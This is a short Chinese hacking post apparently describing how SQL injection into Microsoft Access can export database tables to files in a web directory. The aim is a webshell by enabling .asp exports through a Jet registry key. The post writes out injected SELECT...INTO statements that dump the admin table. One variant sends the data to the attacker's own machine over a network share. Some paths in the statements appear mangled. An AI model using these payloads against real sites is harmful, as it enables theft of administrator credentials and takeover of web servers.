已經聽N個人過說有人已經發現SQL注入Access得到webshell的技術了,也只是聽說而已,具體的細節還是不得而知。
最近在看的書中一章提到Jet的安全,然後靈光一閃,呵呵,發現了一種可以利用Access導出ASP的方法,分享之。
幾個月之前網上就流傳利用SQL注入Access導出數據庫內容到文本文件(可導出txt、htm、Html等格式)的方法:
SELECT*into[test.txt]in'd:web''text;'fromadmin
執行上述語句,在d:web目錄下就會生成test.txt文件,其內容就是表admin的內容。但是導出ASP格式就不行,會說“不能更新,數據庫或對象為只讀”。
其實控制導出文件後綴是存儲在注冊表的,具體鍵值是HKEY_LOCALMacHINESoftwareMicrosoftJet4.0EnginesTextDisableExtension,默認情況下值為“!txt,csv,tab,asc,tmp,htm,Html”,假如我們把ASP也添加進去的話,呵呵,就可以導出ASP格式的文件了。
這個方法跟那個調用Access的Shell函數執行命令一樣,要修改注冊表,所以利用不是很大。
順便提一下,前面提到的導出文本文件的方法假如不知道web路徑貌似可以導出到自己機器的哦:SELECT*into[test.txt]in'\youripshare''text;'fromadmin
